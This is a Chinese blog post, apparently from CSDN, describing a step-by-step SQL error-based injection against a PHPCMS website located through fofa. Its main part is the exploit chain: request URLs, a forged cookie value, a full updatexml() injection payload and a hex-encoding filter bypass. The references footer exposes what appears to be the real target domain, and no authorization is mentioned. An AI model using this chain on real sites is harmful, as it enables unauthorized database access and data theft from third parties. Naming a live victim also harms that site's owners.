某cms网站渗透的过程

最新推荐文章于 2024-10-16 16:47:53 发布
最新推荐文章于 2024-10-16 16:47:53 发布
阅读量1k 收藏 4
点赞数
分类专栏: 暴力渗透测试 奇淫技巧 文章标签: php mysql web 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MachineGunJoe/article/details/116454837
版权
本文详细介绍了如何通过fofa查询识别出PHPCMS网站,并利用其存在的SQL报错注入漏洞进行安全测试。通过设置特定的请求参数,构造SQL报错注入链接,最终解密并执行SQL语句。过程中涉及了cookie伪造、POST请求构造以及16进制编码绕过过滤等技巧,为安全研究人员提供了一次实战案例。
摘要由CSDN通过智能技术生成

1.通过fofa查询出该网站的后台,进去发现很像某cms,利用御剑的cms识别工具识别出对方是phpcms的站。

 

2.通过百度查询得出:该phpcms站点可能存在文件上传,敏感信息泄露,sql报错注入。我只验证出来了sql报错注入。

3.把这几个链接转发到burp的重放器:

1.1:

http://xxxxxx.com.cn/index.php?m=wap&c=index&a=init&siteid=1[1]

获取Set-Cookie: aOqWU_siteid用的。

1.2:

http://xxxxxx.com.cn/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=[2]

sql报错注入转换为Set-Cookie:aOqWU_att_json用的。

1.3:

http://xxxxxx.com.cn/index.php?m=content&c=down&a_k=[3]

解密传输用的。

4.第一个1.1的链接发送go得到Set-Cookie: aOqWU_siteid的key。

 

5.把获取的的key复制到1.2链接最下面,伪造数据为:userid_flash=5608UgJVA1RVCARVBVdSVQRRVgwOAgFUWgMFBgYF,把GET请求改为POST请求。

 

 

6.构造url链接为sql报错注入链接:/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28%28select database()%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26&XDEBUG_SESSION_START=PHPSTORM

点击go,即可得到加密后的SQL了,其实sql语句可以不用url编码的只是一段复制下来的。

 

7.复制那段去1.3链接后面加上就可以解密执行sql语句了,a_k=aOqWU_att_json的key。

 

8.到后面的话因为过滤了'里面的内容'用16进制绕过就好。

参考链接:https://blog.csdn.net/Fly_hps/article/details/85222735?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-6.control&dist_request_id=&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-6.control

References

[1] http://xxxxxx.com.cn/index.php?m=wap&c=index&a=init&siteid=1: http://portal.teacherclub.com.cn/index.php?a=init&c=index&m=wap&siteid=1
[2] http://xxxxxx.com.cn/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=: http://portal.teacherclub.com.cn/index.php?a=swfupload_json&aid=1&c=attachments&m=attachment&src=%26id%3D
[3] http://xxxxxx.com.cn/index.php?m=content&c=down&a_k=: http://portal.teacherclub.com.cn/index.php?a_k=&c=down&m=content

我是黑客
关注
专栏目录
渗透过程cms的指纹识别课件
07-10
渗透过程cms的指纹识别课件
【终极FOFA组合语法指南】如何用FOFA打出组合拳搜索目标资产?
鹅子鱼的博客:很菜但是很好学的小菜鸟
04-20 7145
【终极FOFA组合语法指南】如何用FOFA更快、更准、更专地搜索目标资产?
FOFA操作】fofa检索使用thinkphp框架的网站
SUSUYUA的博客
01-13 3698
fofa检索使用thinkphp框架的网站
fofa批量测试cms_poc
qq_57053860的博客
06-07 226
print('正在提取第' + str(yeshu) + '页')
帝国cms v7.5---漏洞分析
2201_76017178的博客
05-25 7684
帝国CMS漏洞分析,解析EmpireCMSv7.5存在的漏洞以及漏洞的复现
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现)
Continuejww的博客
08-30 2435
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞。
各大CMS网站模板--练习web渗透必备.zip
12-11
各大CMS网站模板作为练习web渗透的靶场,为测试人员提供了实战演练的环境,让他们能够学习如何发现和利用CMS中的漏洞。 常见的CMS系统包括WordPress、Joomla、Drupal等,它们都有自己的特性和安全风险。例如,...
国微CMS网站系统
08-17
总的来说,国微CMS网站系统以其强大的功能、开源的特性、广泛的用户基础和对政府网站需求的深入理解,成为了国内许多组织和机构的首选CMS平台。通过持续的更新和优化,它将不断适应互联网环境的变化,满足更多用户的...
国微CMS 网站系统
08-17
【国微CMS 网站系统】是一款深受国内开发者欢迎的CMS(内容管理系统)平台,尤其在PHP领域具有显著的影响力。作为中国南方最大的开源平台提供商之一,它为超过23万的注册用户提供服务,其下载量更是超过了70万次,这...
渗透测试学习9:CMS渗透
weixin_44315099的博客
03-06 2506
目录概述cms简述robots协议dedecms环境搭建与渗透利用 概述 cms简述 内容管理系统,也可以理解为模板。 cms管理系统识别:通过某项特征来识别,获得网站某个文件的MD5或者⽤正则表达式与字典里面的关键字进行匹配,如果匹配成功就说明这个站点是对于的CMS。 可以用指纹查询来判断目标站点用的什么cms。 国内指纹识别: 云悉 http://www.yunsee.cn/ 潮汐指纹 http://finger.tidesec.net/ who am i web指纹识别 http://whatweb.
史上最全信息收集【非常详细 推荐收藏学习】
hackzkaq的博客
10-27 1462
TXT记录一般指为某个主机名或域名设置的说明,如:2)mail IN TXT "邮件主机, 存放在xxx ,管理人:AAA",Jim IN TXT "contact: abc@mailserver.com"也就是您可以设置 TXT ,以便使别人联系到您。如何检测TXT记录?1、进入命令状态;(开始菜单 - 运行 - CMD[回车]);2、输入命令" nslookup -q=txt 这里填写对应的域名或二级域名",查看返回的结果与设置的是否一致即可。
121.网络安全渗透测试—[CMS后台 getwebshell]—[帝国empirecms6.6后台 getwebshell]
qwsn
07-10 2212
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 登录后台---->栏目---->自定义页面---->增加自定义页面---->填写页面名称为webshell.php(随便)---->文件名默认是…/…/page.html---->文件内容为以下内容:功能是创建shell.php文件并写入一句话到shell.php文件中 栏目---->自定义页面---->管理自定义页面---->点击刚刚的page.html页面触发webshell(其实就是访问http://www.empirecm
510cms网站渗透测试
AmeV_ll的博客
01-23 2040
利用漏洞进行攻击分为漏洞挖掘、漏洞分析和漏洞利用三个步骤。漏洞挖掘是其他两个步骤的前提和基础,所以对于网络的攻防具有重要的意义。漏洞挖掘,顾名思义就是寻找漏洞,主要是通过综合应用各种技术和工具,尽可能地找出软件中的潜在漏洞,然而这并非一件很容易的事情,在很大程度上依赖于个人经验。根据分析对象的不同,漏洞挖掘技术可以分为基于源码的漏洞挖掘技术和基于目标代码的漏洞挖掘技术。
PbootCMS被入侵篡改,应该如何加固pbootcms站点
最新发布
魅宝网络
10-16 858
大家好,我们是安阳市魅宝网络科技有限公司。今天我带来了一条重要消息,可能对很多使用PbootCMS建站的朋友来说是个不小的震动——PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要,不法分子总能通过漏洞进行入侵篡改!
判断一个网站使用CMS渗透测试有什么意义
m0_52484587的博客
07-15 88
通过了解目标网站所使用的CMS渗透测试人员可以针对该CMS的特定漏洞进行深入研究和开发攻击脚本。确定网站使用的CMS有助于收集更准确的目标信息,并为后续测试活动提供更多的线索。常见的CMS包括WordPress、Drupal和Joomla等,它们被广泛用于创建和管理各种类型的网站,从个人博客到企业门户网站都可以使用CMS进行构建和维护。用户权限管理:允许管理员为不同的用户分配不同的权限和角色,控制其对网站内容的访问和编辑权限。模板和主题管理:提供预定义的模板和主题,使用户能够自定义网站的外观和布局。
CMS网站渗透-Server2206-(解析+环境)
m0_46056107的博客
01-29 519
需要换加qq
最新0day! PbootCMS全版本后台通杀任意代码执行漏洞
Liyu_6618的博客
02-02 3397
最新0day! PbootCMS全版本后台通杀任意代码执行漏洞
未公开1day-PbootCMS前台存在信息泄露
weixin_43167326的博客
04-09 1465
PbootCMS是一款开源的内容管理系统,致力于简化网站建设过程。它基于PHP语言和MySQL数据库,提供了丰富的功能和易用的界面,包括内容管理、用户权限管理、模板系统、插件扩展等。PbootCMS具有高度可定制性,用户可以根据自己的需求进行定制和扩展。同时,它还具有响应式设计,能够适应不同设备的显示,为用户提供优秀的浏览体验。
渗透测试-权限提升
weixin_46626737的博客
03-13 532
比如:C://program files/a.exe -f,windows识别到空格,认为后面是参数,正确的应该是”C://program files/a.exe“ -f。命令问题:利用tar压缩,文件名改为--参数类型,从而执行 ,利用定时任务,和SUID(其他命令也可,换文件名-参数)先获得webshell,然后进行上传一些文件,进行测试提权(msf或者手动的EXP),然后创建用户,开启端口,远程连接。假如在C://加一个program恶意文件exe后缀,再次执行,则该恶意文件会被执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是黑客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值